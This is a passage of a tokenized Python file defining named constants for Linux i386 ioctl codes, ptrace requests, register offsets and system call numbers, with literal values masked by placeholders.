<EOL> SIOCGIFHWADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFSLAVE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFSLAVE = 
Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCADDMULTI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDELMULTI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFINDEX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOGIFINDEX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFPFLAGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFPFLAGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDIFADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFHWBROADCAST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFCOUNT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFBR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFBR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFTXQLEN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFTXQLEN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFDIVERT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFDIVERT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCETHTOOL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDRARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGRARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSRARP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFMAP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFMAP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCADDDLCI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDELDLCI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDEVPRIVATE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_TRACEME = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> PTRACE_PEEKTEXT = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PTRACE_PEEKDATA = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PTRACE_PEEKUSR = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PTRACE_PEEKUSER = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PTRACE_POKETEXT = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> PTRACE_POKEDATA = Constant ( 
'<STR_LIT>' , <NUM_LIT:5> ) <EOL> PTRACE_POKEUSR = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> PTRACE_POKEUSER = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> PTRACE_CONT = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> PTRACE_KILL = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> PTRACE_SINGLESTEP = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> PTRACE_ATTACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_DETACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SYSCALL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_GETEVENTMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_GETSIGINFO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SETSIGINFO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACESYSGOOD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEFORK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEVFORK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACECLONE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEEXEC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEVFORKDONE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACEEXIT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_MASK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_EVENT_FORK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PTRACE_EVENT_VFORK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PTRACE_EVENT_CLONE = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PTRACE_EVENT_EXEC = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> PTRACE_EVENT_VFORK_DONE = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> PTRACE_EVENT_EXIT = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> PT_TRACE_ME = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> PT_READ_I = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PT_READ_D = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PT_READ_U = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PT_WRITE_I = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> PT_WRITE_D = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> PT_WRITE_U = Constant ( 
'<STR_LIT>' , <NUM_LIT:6> ) <EOL> PT_CONTINUE = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> PT_KILL = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> PT_STEP = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> PT_ATTACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PT_DETACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBX = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> ECX = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> EDX = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> ESI = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> EDI = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> EBP = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> EAX = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> DS = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> ES = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> FS = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> GS = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> ORIG_EAX = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> EIP = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> CS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EFL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> UESP = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SS = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> FRAME_SIZE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_GETREGS = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> PTRACE_SETREGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_GETFPREGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SETFPREGS = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> PTRACE_GETFPXREGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SETFPXREGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_SETOPTIONS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PTRACE_O_TRACESYSGOOD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_access = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_acct = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_add_key = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_adjtimex = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_afs_syscall = Constant ( 
'<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_alarm = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_bdflush = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_break = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_brk = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_capget = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_capset = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_chdir = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> SYS_chmod = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SYS_chown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_chown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_chroot = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_clock_getres = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:7> ) ) <EOL> SYS_clock_gettime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:6> ) ) <EOL> SYS_clock_nanosleep = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:8> ) ) <EOL> SYS_clock_settime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:5> ) ) <EOL> SYS_clone = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_close = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SYS_creat = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SYS_create_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_delete_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_dup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_dup2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_dup3 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_epoll_create = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_epoll_create1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_epoll_ctl = Constant ( '<STR_LIT>' , <NUM_LIT:255> ) <EOL> SYS_epoll_pwait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_epoll_wait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_eventfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_eventfd2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_execve = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> SYS_exit = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SYS_exit_group = Constant ( 
'<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_faccessat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fadvise64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fadvise64_64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fallocate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fanotify_init = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fanotify_mark = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchmod = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchmodat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fchownat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fcntl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fcntl64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fdatasync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fgetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_flistxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_flock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fork = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SYS_fremovexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fsetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fstat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fstatat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fstatfs = Constant ( '<STR_LIT>' , <NUM_LIT:100> ) <EOL> SYS_fstatfs64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_fsync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ftime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ftruncate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ftruncate64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_futex = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_futimesat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getcpu = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getcwd = Constant ( '<STR_LIT>' , <NUM_LIT> 
) <EOL> SYS_getdents = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getdents64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getegid = Constant ( '<STR_LIT>' , <NUM_LIT:50> ) <EOL> SYS_getegid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_geteuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_geteuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getgid32 = Constant ( '<STR_LIT>' , <NUM_LIT:200> ) <EOL> SYS_getgroups = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getgroups32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getitimer = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_get_kernel_syms = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_get_mempolicy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getpgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getpgrp = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getpid = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> SYS_getpmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getppid = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> SYS_getpriority = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getresgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getresgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getresuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getresuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_get_robust_list = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getrusage = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getsid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_get_thread_area = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_gettid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_gettimeofday = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_gtty = Constant ( 
'<STR_LIT>' , <NUM_LIT:32> ) <EOL> SYS_idle = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_init_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_inotify_add_watch = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_inotify_init = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_inotify_init1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_inotify_rm_watch = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_cancel = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ioctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_destroy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_getevents = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ioperm = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_iopl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ioprio_get = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ioprio_set = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_setup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_submit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ipc = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_keyctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_kill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lchown = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SYS_lchown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lgetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_link = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SYS_linkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_listxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_llistxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS__llseek = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lookup_dcookie = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lremovexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lseek = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lsetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lstat64 = Constant ( 
'<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_madvise = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_madvise1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mbind = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_migrate_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mincore = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mkdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mkdirat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mknod = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mknodat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mlock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mlockall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mmap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mmap2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_modify_ldt = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mount = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_move_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mprotect = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mpx = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mq_getsetattr = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:5> ) ) <EOL> SYS_mq_notify = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:4> ) ) <EOL> SYS_mq_open = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mq_timedreceive = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:3> ) ) <EOL> SYS_mq_timedsend = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:2> ) ) <EOL> SYS_mq_unlink = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> SYS_mremap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_msync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_munlock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_munlockall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_munmap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_nanosleep = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS__newselect = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_nfsservctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_nice = Constant ( 
'<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_oldfstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_oldlstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_oldolduname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_oldstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_olduname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_open = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SYS_openat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pause = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_perf_event_open = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_personality = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pipe = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pipe2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pivot_root = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_poll = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ppoll = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_prctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pread = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_preadv = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_prlimit64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_prof = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_profil = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pselect6 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ptrace = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_putpmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pwrite = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pwritev = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_query_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_quotactl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_read = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SYS_readahead = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_readdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_readlink = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_readlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_readv = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_reboot = 
Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_recvmmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_remap_file_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_removexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rename = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_renameat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_request_key = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rmdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigaction = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigpending = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigprocmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigqueueinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigreturn = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigsuspend = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigtimedwait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_tgsigqueueinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_getaffinity = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_getparam = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_get_priority_max = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_get_priority_min = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_getscheduler = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_rr_get_interval = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_setaffinity = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_setparam = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_setscheduler = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_yield = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_select = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sendfile = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sendfile64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setdomainname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setfsgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setfsgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> 
SYS_setfsuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setfsuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setgroups = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setgroups32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sethostname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setitimer = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_set_mempolicy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setpgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setpriority = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setregid 